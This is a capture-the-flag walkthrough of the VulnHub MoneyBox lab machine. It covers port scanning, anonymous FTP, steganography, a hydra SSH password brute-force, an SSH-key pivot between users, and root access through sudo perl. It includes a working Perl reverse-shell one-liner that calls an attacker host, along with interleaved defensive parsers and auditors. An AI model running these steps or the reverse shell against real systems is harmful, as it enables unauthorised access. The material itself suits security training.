Escape

Overview

Name: Template
Release Date: 2024-11-08
Write-up Author: kill3r
Machine Author: kill3r
Difficulty: Easy
User Flag:
Root Flag:
Link: https://www.vulnhub.com/entry/moneybox-1,653/

Weak points

  1. Image steganography

Nmap scan

ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.103 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 192.168.56.103 -oN nmap.txt
# The first line scans every port (1 to 65535) of the target host with nmap; --min-rate=1000 sends at least 1000 packets per second and -T4 selects the aggressive timing template.
# grep -oE '(^[0-9][^/tcp]*)' pulls the port numbers out of the output and tr '\n' ',' joins them into one comma-separated string.
# The second line scans only those ports: -p$ports uses the extracted list, -sV does service version detection, -sC runs the default NSE scripts (common checks), -O does OS detection, and -oN nmap.txt saves the results to nmap.txt.
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.103 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.56.103 -oN nmap.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-08 10:02 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00050s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.102
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
| 256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_ 256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MoneyBox
MAC Address: 08:00:27:94:02:31 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds
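As an added, defender-side example (not part of the original write-up): a small parser for nmap's normal (-oN) output, such as the nmap.txt saved above, that turns the ftp-anon and ftp-syst script results into findings an auditor would log. The report embedded below is a constructed excerpt in the shape of the scan output; the function names are the example's own.

```python
"""Parse nmap -oN (normal) output and raise the findings a defender would log
from the scan above: anonymous FTP, files exposed to anonymous users and a
plaintext FTP channel. Added example, not code from the write-up; the report
below is a CONSTRUCTED excerpt shaped like the scan output."""
import re

SAMPLE_REPORT = """\
Nmap scan report for 192.168.56.103
Host is up (0.00050s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Logged in as ftp
|      Control connection is plain text
|      Data connections will be plain text
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|_  2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
"""

# "21/tcp open  ftp     vsftpd 3.0.3"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE script header: "| name: text" or "|_name: text"; deeper-indented or
# unnamed lines are continuation output of the current script.
SCRIPT_HDR_RE = re.compile(r"^\|(?:_| )([\w-]+):\s?(.*)$")


def parse_nmap_normal(text):
    """Return one dict per port line; script output is attached to the port it
    follows, keyed by script name, one list entry per output line."""
    ports = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(), "scripts": {},
            })
            current = None
            continue
        if not ports or not line.startswith("|"):
            continue
        h = SCRIPT_HDR_RE.match(line)
        if h:
            current = h.group(1)
            first = h.group(2).strip()
            ports[-1]["scripts"][current] = [first] if first else []
        elif current is not None:
            ports[-1]["scripts"][current].append(line.lstrip("|_").strip())
    return ports


def flag_findings(ports):
    """Turn script output into (port, severity, message) findings."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        label = f"{p['port']}/{p['proto']}"
        anon = p["scripts"].get("ftp-anon", [])
        if any("Anonymous FTP login allowed" in l for l in anon):
            findings.append((label, "high", "anonymous FTP login allowed"))
            # remaining ftp-anon lines are directory entries visible to anonymous
            for entry in anon[1:]:
                fields = entry.split()
                # "-rw-r--r--": index 7 is the 'other' read bit
                if fields and len(fields[0]) == 10 and fields[0][0] == "-" and fields[0][7] == "r":
                    findings.append((label, "medium",
                                     f"world-readable file served to anonymous FTP: {fields[-1]}"))
        syst = p["scripts"].get("ftp-syst", [])
        if any("plain text" in l for l in syst):
            findings.append((label, "medium", "FTP control/data channel is plaintext (no TLS)"))
    return findings


if __name__ == "__main__":
    for port, sev, msg in flag_findings(parse_nmap_normal(SAMPLE_REPORT)):
        print(f"[{sev}] {port}: {msg}")
```

Run against a real nmap.txt by reading the file into `parse_nmap_normal`; the parser ignores host banner lines and only attaches `|`-prefixed script output to the most recent port line.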

Enumeration

SMB enumeration

Ports: 139 389 445 636

  • enum4linux -a/-A 127.0.0.1
$ enum4linux -A <ip>
  • MSF-SMB
# Fingerprint the SMB version
msf6 > use auxiliary/scanner/smb/smb_version
# Enumerate shared folders
msf6 > use auxiliary/scanner/smb/smb_enumshares
# Enumerate user information over SMB (SID lookup)
msf6 > use auxiliary/scanner/smb/smb_lookupsid

Web

HTTP web server, ports like: 80 443 81 8080 8443 4443 8081

  • Finger: retrieves the user list and configuration information for a specific user or for the users on a system

whatweb

# Identifies and analyses a target website's technology stack, CMS (content management system), plugins, frameworks and other site-related information by analysing the site's responses and page content
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.56.103
http://192.168.56.100 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.56.100], Script[text/javascript]
  • Directory enumeration

dirb http://192.168.56.100

dirsearch -u http://192.168.56.100 -r

gobuster dir -w ... -u http://192.168.56.100 -x html,php,js,bak

┌──(root㉿kill3r)-[/home/kill3r]
└─# gobuster dir -u "192.168.56.103" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/blogs (Status: 301) [Size: 316] [--> http://192.168.56.103/blogs/]
Progress: 37067 / 220561 (16.81%)
Progress: 47178 / 220561 (21.39%)

/server-status (Status: 403) [Size: 279]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
  • Vulnerability scanning
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/

wordlist

  • pass.list
3xtr4ctd4t4
  • user.list
renu
lily

Walkthrough

FTP

The nmap scan shows that FTP allows anonymous login: the username is anonymous and the password is anonymous or empty.

An image is found; download it with get trytofind.jpg.

Nothing stands out in the image itself, so switch to a CTF mindset and check whether it carries hidden (steganographic) data.

steghide version 0.5.1

the first argument must be one of the following:
embed, --embed display embed data
extract, --extract extract data
info, --info display information about a cover- or stego-file
info <filename> display information about <filename>
encinfo, --encinfo display a list of supported encryption algorithms
version, --version display version information
license, --license display steghide's license
help, --help display this usage information

embedding options:
-ef, --embedfile select file to be embedded
-ef <filename> embed the file <filename>
-cf, --coverfile select cover-file
-cf <filename> embed into the file <filename>
-p, --passphrase specify passphrase
-p <passphrase> use <passphrase> to embed data
-sf, --stegofile select stego file
-sf <filename> write result to <filename> instead of cover-file
-e, --encryption select encryption parameters
-e <a>[<m>]|<m>[<a>] specify an encryption algorithm and/or mode
-e none do not encrypt data before embedding
-z, --compress compress data before embedding (default)
-z <l> using level <l> (1 best speed ... 9 best compression)
-Z, --dontcompress do not compress data before embedding
-K, --nochecksum do not embed crc32 checksum of embedded data
-N, --dontembedname do not embed the name of the original file
-f, --force overwrite existing files
-q, --quiet suppress information messages
-v, --verbose display detailed information

extracting options:
-sf, --stegofile select stego file
-sf <filename> extract data from <filename>
-p, --passphrase specify passphrase
-p <passphrase> use <passphrase> to extract data
-xf, --extractfile select file name for extracted data
-xf <filename> write the extracted data to <filename>
-f, --force overwrite existing files
-q, --quiet suppress information messages
-v, --verbose display detailed information

options for the info command:
-p, --passphrase specify passphrase
-p <passphrase> use <passphrase> to get info about embedded data

To embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt
To extract embedded data from stg.jpg: steghide extract -sf stg.jpg
┌──(root㉿kill3r)-[/home/kill3r]
└─# steghide extract -sf trytofind.jpg
# A passphrase is required, so this path is blocked for now; look at the other ports

Use the passphrase obtained later (the Key found during web enumeration) to extract the data.

A note addressed to a user named renu is found, saying roughly: your password is probably weak, please change it and take this seriously. We can brute-force it.

SSH

┌──(root㉿kill3r)-[/home/kill3r]
└─# hydra -l renu -P /opt/pwcrack/PasswordDic/用户名和密码/密码/rockyou.txt 192.168.56.103 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-08 10:33:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344401 login tries (l:1/p:14344401), ~896526 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[22][ssh] host: 192.168.56.103 login: renu password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-08 10:34:20

The password was brute-forced successfully; log in over SSH and gather information once in.
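The hydra run above leaves a recognisable trail in the target's sshd log. As an added example (not from the write-up), the detector below reads auth.log-style lines, groups password failures per source address, and escalates when the same source logs in shortly after its burst, which is exactly what a successful guess looks like. The log lines are constructed, the year is assumed because syslog timestamps omit it, and the thresholds are example values.

```python
"""Detect the password-guessing pattern a hydra run leaves in sshd logs:
a burst of 'Failed password' lines from one source, followed shortly by an
'Accepted password' for the same source (the guess succeeded). Added example,
not code from the write-up; the log lines are CONSTRUCTED in Debian 10
/var/log/auth.log format and LOG_YEAR is an assumption (syslog omits it)."""
import re
from collections import defaultdict
from datetime import datetime

LOG_YEAR = 2023  # assumption: syslog timestamps carry no year

SAMPLE_AUTH_LOG = """\
Sep  8 10:33:28 MoneyBox sshd[1201]: Failed password for renu from 192.168.56.102 port 40210 ssh2
Sep  8 10:33:28 MoneyBox sshd[1203]: Failed password for renu from 192.168.56.102 port 40212 ssh2
Sep  8 10:33:29 MoneyBox sshd[1205]: Failed password for invalid user admin from 192.168.56.102 port 40214 ssh2
Sep  8 10:33:29 MoneyBox sshd[1207]: Failed password for renu from 192.168.56.102 port 40216 ssh2
Sep  8 10:33:30 MoneyBox sshd[1209]: Failed password for renu from 192.168.56.102 port 40218 ssh2
Sep  8 10:33:31 MoneyBox sshd[1211]: Failed password for renu from 192.168.56.102 port 40220 ssh2
Sep  8 10:33:40 MoneyBox sshd[1250]: Accepted password for renu from 192.168.56.102 port 40300 ssh2
Sep  8 10:45:02 MoneyBox sshd[1300]: Failed password for lily from 192.168.56.50 port 51000 ssh2
Sep  8 10:47:10 MoneyBox sshd[1302]: Accepted publickey for lily from 127.0.0.1 port 52000 ssh2: RSA SHA256:CONSTRUCTEDFINGERPRINT
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line):
    """Return a dict for sshd auth result lines, None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=LOG_YEAR)
    return {"ts": ts, "result": m.group("result"), "method": m.group("method"),
            "user": m.group("user"), "ip": m.group("ip")}


def detect_bruteforce(text, threshold=5, window=60, success_grace=300):
    """Alert when one source IP produces >= threshold failures inside `window`
    seconds; escalate to high if that IP then logs in within `success_grace`
    seconds of the burst, which is what a successful guessing run looks like."""
    events = [e for e in (parse_line(l) for l in text.splitlines()) if e]
    failures = defaultdict(list)
    for e in events:
        if e["result"] == "Failed":
            failures[e["ip"]].append(e["ts"])

    alerts, burst_end = [], {}
    for ip, times in failures.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j + 1 < len(times) and (times[j + 1] - times[i]).total_seconds() <= window:
                j += 1
            if j - i + 1 >= threshold:
                alerts.append({"ip": ip, "severity": "medium", "failures": j - i + 1,
                               "first": times[i], "last": times[j]})
                burst_end[ip] = times[j]
                break  # one alert per source is enough here

    for e in events:
        if e["result"] != "Accepted" or e["ip"] not in burst_end:
            continue
        gap = (e["ts"] - burst_end[e["ip"]]).total_seconds()
        if 0 <= gap <= success_grace:
            alerts.append({"ip": e["ip"], "severity": "high", "user": e["user"],
                           "method": e["method"], "seconds_after_burst": gap})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(a)
```

The single failure from 192.168.56.50 and lily's key-based login from 127.0.0.1 stay below the threshold and produce no alert; the high-severity alert is the one worth paging on, because it means the guessed credential is now in use.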

renu@MoneyBox:~$ id
uid=1001(renu) gid=1001(renu) groups=1001(renu)

renu@MoneyBox:~$ grep -E '/bin/bash$' /etc/passwd
root:x:0:0:root:/root:/bin/bash
lily:x:1000:1000:lily,,,:/home/lily:/bin/bash
renu:x:1001:1001::/home/renu:/bin/bash
# A lily user exists, but we do not know the password yet, so set it aside for now

renu@MoneyBox:~$ ls
# user1.txt is found
Yes...!
You Got it User1 Flag

==> us3r1{F14g:0ku74tbd3777y4}
# Next, review the user's command history
renu@MoneyBox:~$ history
1 cler
2 ls
3 ls -la
4 cd /home
5 ls
6 clear
7 cd
8 ls
9 ls -la
10 exit
11 clear
12 ls
13 ls -la
14 cd /home
15 ls
16 cd lily
17 ls
18 ls -la
19 clear
20 cd
21 clear
22 ssh-keygen -t rsa # an RSA key pair was generated
23 clear
24 cd .ssh
25 ls
26 ssh-copy-id lily@192.168.43.80 # the key was copied to the lily user; this box also has a lily user, which we can confirm later
27 clear
28 cd
29 cd -
30 ls -l
31 chmod 400 id_rsa
32 ls -l
33 ssh -i id_rsa lily@192.168.43.80
34 clear
35 ssh -i id_rsa lily@192.168.43.80 # log in as lily with the key file
36 cd
37 clear
38 cd .ssh/
39 ls
40 ssh -i id_rsa lily@192.168.43.80
41 su lily # switch to the lily user
42 clear
43 cd
44 sudo apt install openssh
45 sudo apt update
46 sudo apt install openssh-server # install the OpenSSH server
47 sudo service ssh start
48 sudo service ssh status
49 clear
50 cd /etc/
51 ls
52 cd ssh
53 ls
54 nano ssh_config
55 ls
56 nano sshd_config
57 clear
58 cd
59 ls
60 ls -la
61 chsh bash
62 chsh
63 clear
64 su root
65 clear
66 sudo apt install openssh
67 su root
68 exit

Normally the current user's home directory should contain a .ssh folder with an id_rsa.pub file.

That checks out. Next, confirm whether lily's ~/.ssh contains an authorized_keys file; if its content is renu's public key, we can log in as lily with ssh lily@127.0.0.1 using that key.

The contents match; try logging in.

renu@MoneyBox:/home/lily/.ssh$ ssh lily@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
lily@MoneyBox:~$
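The renu to lily hop works because lily's authorized_keys accepts renu's public key, a cross-account trust that is easy to miss in an audit. As an added example (not part of the write-up), the script below scans a /home tree, maps each ~/.ssh/*.pub key to its owner and reports every authorized_keys entry that lets one account log in as another. The home tree, file names and key blobs are constructed in a temporary directory; none of the key material is real.

```python
"""Audit which accounts' public keys are accepted by other accounts'
authorized_keys, i.e. the renu -> lily key trust used above. Added example,
not code from the write-up. build_sample_homes() writes a CONSTRUCTED /home
tree into a temp directory; the key blobs are placeholders, not real keys."""
import os
import tempfile

# constructed placeholder key material (not valid keys): user -> (file, line)
SAMPLE_PUBKEYS = {
    "renu": ("id_rsa.pub",
             "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCrenuCONSTRUCTEDKEYMATERIAL renu@MoneyBox"),
    "lily": ("id_ed25519.pub",
             "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIlilyCONSTRUCTEDKEYMATERIAL lily@MoneyBox"),
}
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")


def build_sample_homes(root):
    """Create renu and lily home dirs; lily's authorized_keys trusts renu's key,
    as the write-up found on the box."""
    for user, (name, pub) in SAMPLE_PUBKEYS.items():
        ssh_dir = os.path.join(root, user, ".ssh")
        os.makedirs(ssh_dir, exist_ok=True)
        with open(os.path.join(ssh_dir, name), "w") as f:
            f.write(pub + "\n")
    with open(os.path.join(root, "lily", ".ssh", "authorized_keys"), "w") as f:
        f.write("# keys allowed to log in as lily\n")
        f.write(SAMPLE_PUBKEYS["lily"][1] + "\n")  # lily's own key: not a finding
        # renu's key, with an authorized_keys option in front of it
        f.write('from="192.168.43.80" ' + SAMPLE_PUBKEYS["renu"][1] + "\n")
    return root


def key_identity(line):
    """(type, base64 blob) of a public-key line, or None for comments/blanks.
    Leading authorized_keys options such as from="..." are skipped."""
    fields = line.strip().split()
    for i, f in enumerate(fields):
        if f.startswith(KEY_TYPES) and i + 1 < len(fields):
            return (f, fields[i + 1])
    return None


def audit_key_trust(home_root):
    """Return sorted (key_owner, target_account) pairs where a key found in
    key_owner's ~/.ssh/*.pub is accepted by target_account's authorized_keys.
    Keys not matched to any *.pub are reported with owner '<unknown key>'."""
    owners = {}
    for user in sorted(os.listdir(home_root)):
        ssh_dir = os.path.join(home_root, user, ".ssh")
        if not os.path.isdir(ssh_dir):
            continue
        for name in os.listdir(ssh_dir):
            if name.endswith(".pub"):
                with open(os.path.join(ssh_dir, name)) as f:
                    for line in f:
                        kid = key_identity(line)
                        if kid:
                            owners[kid] = user
    trust = set()
    for user in sorted(os.listdir(home_root)):
        ak = os.path.join(home_root, user, ".ssh", "authorized_keys")
        if not os.path.isfile(ak):
            continue
        with open(ak) as f:
            for line in f:
                kid = key_identity(line)
                if kid is None:
                    continue
                owner = owners.get(kid, "<unknown key>")
                if owner != user:
                    trust.add((owner, user))
    return sorted(trust)


def demo():
    """Build the constructed tree in a temp dir and audit it."""
    return audit_key_trust(build_sample_homes(tempfile.mkdtemp()))


if __name__ == "__main__":
    for owner, target in demo():
        print(f"key of {owner} grants login as {target}")
```

Point `audit_key_trust` at the real /home as root to get the same report for a live system; an `<unknown key>` owner means an authorized key whose private half is not on this host at all, which deserves its own follow-up.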

Continue gathering information

lily@MoneyBox:~$ ls
user2.txt
lily@MoneyBox:~$ cat user2.txt
Yeah.....
You Got a User2 Flag

==> us3r{F14g:tr5827r5wu6nklao}
# Check privileges
lily@MoneyBox:~$ id
uid=1000(lily) gid=1000(lily) groups=1000(lily),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

# Review the command history
lily@MoneyBox:~$ history
1 whoami
2 exit
3 sudo -l
4 clear
5 find / -type f -user lily -perm 4000
6 find / -type f -user lily -perm 4000 2>/dev/null
7 find / -type f -user root -perm 4000 2>/dev/null
8 exit
9 find / -type f -user root -perm 4000 2>/dev/null
10 find / -type f -user lily -perm 4000 2>/dev/null
11 find / -type f -user lily -perm 4000
12 clear
13 find / -type f -user lily -perm 4000 2>/dev/null
14 exit
15 find / -type f -user lily -perm 4000 2>/dev/null
16 find / -type f -root lily -perm 4000 2>/dev/null
17 sudo -l
18 clear
19 exit
20 sudo -l
21 clear
22 exit
23 cd
24 clear
25 su renu
26 clear
27 cd /usr/bin/
28 ls
29 ls ping
30 ls -l ping
31 chmod u+s ping
32 chmod -u+s ping
33 ls -l ping
34 sudo chmod -u+s ping
35 ls -l ping
36 sudo chmod u+r ping
37 sudo chmod u+w ping
38 ls -l ping
39 sudo chmod g-s ping
40 ls -l ping
41 apt update
42 sudo apt update
43 ls
44 ls -l whoami
45 sudo chmod 400 ping
46 sudo chmod u+x ping
47 ls -l ping
48 clear
49 cd
50 cd /etc/
51 nano sudoers
52 sudo nano sudoers
53 cd /usr/bin
54 ls nano
55 ls more
56 clear
57 cd /etc/
58 sudo nano sudoers
59 su root
60 ls
61 ls -la
62 clear
63 ls -la
64 nano user2.txt
65 ls
66 cat user2.txt
67 exit
# The history shows SUID bits being set, so SUID privilege escalation may be possible
lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
(ALL : ALL) NOPASSWD: /usr/bin/perl
# perl can be run as root without a password, and perl can spawn a reverse shell
# Listen on the Kali box
┌──(root㉿kill3r)-[/home/kill3r]
└─# nc -lvvp 6666
listening on [any] 6666 ...
# Run perl via sudo
lily@MoneyBox:~$ sudo /usr/bin/perl -e 'use Socket;$i="192.168.56.102";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
lily@MoneyBox:~$ id
# root privileges obtained
# Check whether python is available to upgrade to a fully interactive shell

# which python
# which python3
/usr/bin/python3
# python3 is present
# python3 -c 'import pty;pty.spawn("/bin/bash")';
root@MoneyBox:/home/lily# ls
ls
user2.txt
root@MoneyBox:/home/lily# cd /root
cd /root
root@MoneyBox:~# ls -a
. .. .bash_history .bashrc .local .profile .root.txt
root@MoneyBox:~# cat .root.txt
cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag
==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
It's My First CTF Box

instagram : ____kirthik____

See You Back....

root@MoneyBox:~# history
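The root step relies on a sudoers rule granting NOPASSWD access to an interpreter. As an added example (not part of the write-up), the auditor below parses sudoers-style user specifications, carries tags such as NOPASSWD across a comma-separated command list the way sudo does, and flags rules that grant ALL or a shell-capable binary. The sudoers text is constructed (it reproduces the lily/perl rule seen above) and SHELL_CAPABLE is an illustrative subset, an assumption rather than a complete list.

```python
"""Audit sudoers rules for the weakness exploited above: NOPASSWD (or any)
sudo access to a binary that can spawn a shell, such as /usr/bin/perl.
Added example, not code from the write-up; the sudoers text is CONSTRUCTED
and SHELL_CAPABLE is an illustrative subset of interpreters, editors and
pagers that can run arbitrary commands, not an exhaustive list."""
import os
import re

SAMPLE_SUDOERS = """\
# constructed /etc/sudoers
Defaults        env_reset, mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
lily    ALL=(ALL : ALL) NOPASSWD: /usr/bin/perl
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /bin/tar
www-data ALL=(root) /usr/sbin/service apache2 restart
"""

SHELL_CAPABLE = {"perl", "python", "python2", "python3", "ruby", "php", "node",
                 "bash", "sh", "dash", "zsh", "env", "find", "awk", "vi", "vim",
                 "nano", "less", "more", "man", "rsync", "tar"}

SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")
# "lily ALL=(ALL : ALL) NOPASSWD: /usr/bin/perl"
SPEC_RE = re.compile(r"^(?P<who>[%+]?[\w.-]+)\s+(?P<hosts>\S+)\s*=\s*"
                     r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"^([A-Z_]+):\s*")


def split_tags(cmd):
    """Peel leading tags (NOPASSWD:, SETENV:, ...) off one command entry."""
    tags = []
    m = TAG_RE.match(cmd)
    while m:
        tags.append(m.group(1))
        cmd = cmd[m.end():]
        m = TAG_RE.match(cmd)
    return tags, cmd.strip()


def audit_sudoers(text):
    """Return findings for user specs granting ALL or a shell-capable binary.
    The root user's own ALL rule is the normal baseline and is not reported."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        who, runas = m.group("who"), (m.group("runas") or "root").strip()
        inherited = []  # sudo carries tags over to later commands on the same line
        for entry in m.group("cmds").split(","):
            tags, cmd = split_tags(entry.strip())
            inherited = tags or inherited
            binary = os.path.basename(cmd.split()[0]) if cmd else ""
            nopasswd = "NOPASSWD" in inherited
            if cmd == "ALL":
                if who == "root":
                    continue
                findings.append({"who": who, "runas": runas, "command": cmd, "tags": inherited,
                                 "severity": "high", "reason": "unrestricted sudo"})
            elif binary in SHELL_CAPABLE:
                findings.append({"who": who, "runas": runas, "command": cmd, "tags": inherited,
                                 "severity": "high" if nopasswd else "medium",
                                 "reason": f"{binary} can spawn a shell as {runas}"})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['who']} -> {f['command']} ({f['reason']})")
```

Feed it the output of `visudo -c -f` checked files or the contents of /etc/sudoers and /etc/sudoers.d/*; the fix for the rule seen on this box is to remove the interpreter grant entirely, since no argument restriction makes perl safe to run as root.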

Web

Browse the target and look for functionality.

The page source holds nothing of interest beyond a hint that this is a very easy box, so run a directory scan.

The blogs directory is found; visit it, view its source, and keep scanning directories under it.

The directory scan returns nothing, but the page source contains a comment: <!--the hint is the another secret directory is S3cr3t-T3xt-->

It points to a directory named S3cr3t-T3xt; visit it.

A Key is found; this Key is probably the passphrase for the data hidden in the image.

Shell as user1

renu@MoneyBox:~$ cat user1.txt 
Yes...!
You Got it User1 Flag

==> us3r1{F14g:0ku74tbd3777y4}

Shell as user2

lily@MoneyBox:~$ cat user2.txt 
Yeah.....
You Got a User2 Flag

==> us3r{F14g:tr5827r5wu6nklao}

Shell as root

Save a screenshot as the flag or proof.

root@MoneyBox:~# cat .root.txt
cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag
==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
It's My First CTF Box

instagram : ____kirthik____

See You Back....